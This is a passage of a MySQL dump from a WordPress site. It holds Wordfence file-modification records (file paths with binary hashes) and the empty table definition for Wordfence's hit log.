�ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('��ɱ%��a{Z�j	%�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('���U�ϋ���S�88:O','wp-includes/wp-includes/js/jquery/jquery.color.min.js',0,'rq�*X�gq�O�(͈','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[~ .z\n.a�Y^�h�w','�(��� �̰�bu���e�\nud���l�s&�׵','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(-\'���R���\"','�ݔ��7��\"^D�C���o>0ս�2]L�','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M0����*��','���-ZE�\n�*��6�]\\� ]m�{N��','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�V(#=���0�����?','�8�;�cb7�]���tt-p��#�Q(��C��','',0,'?'),('�	e1�n2��c��Χ','wp-content/plugins/wp-cerber/assets/flags/uz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��S�UA��R-Ƌ','Ț���1}\n{%`Tbh����3�ٷ���.D�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eƧ�A.�E�2��$','YPU���ѱ�O�*��N=|H�Tt���\\8`','',0,'?'),('��A����)͹D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s_7�;�	]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�.� h`3XT\\W�ߴ','4�G˼���GO��w���m�qV�z8��밹','',0,'?'),('�H}�A�J�\nG�o)u','wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��᳀��2���rmV','���r���J]s6�8�˜2!��\ZpG����','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�w	���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�_\r�w�{iv�','W�q��$�|��yn���a�$\06ܖ<(�Ƴ�}','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('��BV�\'/�l���Ov','wp-includes/wp-includes/js/jquery/ui/tooltip.js',0,'�&�<Q�1}�������','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E~��2\'o	�?�','�	UWt��\"\Z��;��|w�^	r\"�:[_cA�}','',0,'?'),('��3�(�q7M�hv��','wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',0,'��pF��t1�+���','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('��ؘ�-�m4)}��	�','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DW����8ӳ$�','F�1�ω4��z���*A�⡯���$���(��8�','',0,'?'),('����TM)��7�^\\9��','wp-includes/wp-includes/js/swfupload/handlers.js',0,'��*�#�0�-�Ճp�','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('����}c�>���[G�@�','wp-includes/wp-includes/rest-api/class-wp-rest-response.php',0,'�f�0����Sy?�','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Vc�%��Iv���','wp-includes/wp-includes/blocks/separator/block.json',0,'L��Tz�g�\'†U�c','L��Tz�g�\'†U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�K��y�\"��J���','~T��)_����ԇ���YH+���ɏ\'�	;','',0,'?'),('�0��kl)���','wp-includes/wp-includes/IXR/class-IXR-error.php',0,'g6\"���u\\\'3����b�','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('�*t�*��̚uИ�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/buttons/icons/tick.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɵ(�Tyg�/y��','�D���<q7پ �^��E_{G6���_\Z�b�','',0,'?'),('�/�Х� qm&VMc~�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',0,'	~��ZJ�yΧ�%���','	~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�D����]�|߼�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('�������9]��\'�9�','wp-includes/wp-includes/css/wp-embed-template-ie.min.css',0,'7{WP�L�{H���I�','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2΢�	�/�E!�<s�','\\�=���5��3	�ώv��_%�2��A�?$','',0,'?'),('��+h��vy�{�\\','wp-content/themes/sg-window/img/4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�2ۜSu2���','�̶�-�zPo=a��b���P����c1}��Ty','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('��w0�=_b��&��Oc�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',0,'�G��5]{\"���V�','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('����D�ĥC�x^�,�','wp-content/themes/sg-window/sidebar-1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�2	�Uj����ة]','�hCm����/8����٘^�3��Y���y�','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('���VY�7�z��a]E\Z','wp-includes/wp-includes/ms-site.php',0,'�ظ;�#�t��r�/+0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('�])��	���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�%~o�.A���0GU','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',0,'l,��r�%�^x�%','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;_Ǡ8Є��=�','\0ҧ]W���	�M�o�5m�d�p�Hb#�Wp�M\'','',0,'?'),('�?P���q��%�]2\"','wp-includes/wp-includes/ms-deprecated.php',0,'������K��Mý','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�q_=�s9�N�@ũ�','(�R�ƒQ�c�4o{]�����R��RZW','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v,d��,��ȁ��','�-(wE��Cg�E��u���\"�u�7������','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�_O$��.D�]���','	�\ZV�}���0���\r�7����n�^i��@��','',0,'?'),('�,5X��{�e�','wp-content/plugins/wordfence/js/wfpopover.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��|M�S�p`gK~�','e�^��\'a;H�%	V�<�e5iXT\n܎~T�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('���~#Q�I���','wp-includes/wp-includes/js/thickbox/thickbox.js',0,'��|}�\Zc�%��9j��','��|}�\Zc�%��9j��','��b?/a#�׼�h�l��������\rk���','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�Ԃ��\"Av\n���Z','wp-content/themes/sg-window/inc/customize-other.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؊��keݚ�{�n','`[<��O)i���t�\\%qח��ؼ�Ҋ@2�','',0,'?'),('�ٯ��e>��ƫI���','wp-includes/wp-includes/theme.php',0,'W]��(DR{��.','W]��(DR{��.','Xe[	�4\0����\",����d��ځ��#�','',0,'?'),('��p�^a��F齔���-','wp-includes/wp-includes/IXR/class-IXR-date.php',0,'I��VdB+A�J?��#','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('����K(����y�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',0,'��7֊i[L�9ƁH	�','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('����	�JX����','wp-includes/wp-includes/js/jquery/ui/effect-puff.js',0,'��CH��w�d���֞','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('�!pE������V�tde','wp-includes/wp-includes/Requests/Exception/HTTP/429.php',0,'S��%|F.àZd����','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�G���!#h�9	��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�J�¦1�f�%��','wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',0,'�h�Co�;�,.!O^�>','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.�	�ח','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�hiYt��@mOKQ��V','wp-content/themes/shootingstar/functions/about/images/header_bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Za޹���}��]�','���^�Ra����Lh��BxJ\Z@�\\���ԁT','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$	����\n�VFv�ʸ��_�K~\\','',0,'?'),('�us�T­B��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('���\"��M��y���','wp-includes/wp-includes/Requests/Exception/HTTP/408.php',0,'@>1d�IX�O��ȷv�','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a؂�4','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{�	\n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('����n�oG1��|*','wp-includes/wp-includes/class.wp-styles.php',0,'�U���vz��4�<q\Z�','�U���vz��4�<q\Z�','���/U��V�tD��b}��F�9S��z���','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�o��Eѩ�$J�\n','wp-includes/wp-includes/Requests/IRI.php',0,'52]��{�}��	`X','52]��{�}��	`X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�>ޤ��+~�tͫ��*','I|��^ψg�?nƏA�d�����]68R��','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�0�w��t�Nl嬣','܂s�H�<�&�`�vЖX+v^=0�O]�?!�`','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ƛ�;��^\'��pD?�','�i��`)��\'B�O�踴ǹ�Z{�B�$D�87\0','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�e+uh��a���7','wp-includes/wp-includes/block-patterns.php',0,'��\'׊�@~w\0�5','��\'׊�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('���y�B�diu�^�','wp-includes/wp-includes/sodium_compat/lib/constants.php',0,'����{�#��l�>m','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('����d�j8�\Z ��\"','wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css',0,'xs!�����U,U���','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),('��_7�8r�>�z�`','wp-includes/wp-includes/js/dist/primitives.js',0,'���-�v��t��(4V','���-�v��t��(4V','���a��_��Lx�c$��tU�v�����%��','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),('�$��OA����sL\'','wp-includes/wp-includes/js/hoverintent-js.min.js',0,' p��.`�u76��?',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�C������Q��','wp-content/themes/sg-window/page-templates/no-content-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[˹:w�_�CP�\"','7O�r�B�a)+c���%�g%�(!�~C4R','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�?.O��4�o��V֡','��f��ɲ��AE�u�k���L�t+KZ	�Ť�','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>����ͯ\ZHdy��4','-�ڣ���|A\rc���w��H4�Up����c�','',0,'?'),('�V&�[��i�x����','wp-includes/wp-includes/class-wp-feed-cache-transient.php',0,'�x��?^>��O�','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('�f�nV<���2qð','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',0,'�=��p�5%�h$�*�','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z�	h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL	\'8FJ','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhits`
--

DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=12672 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhits`
--

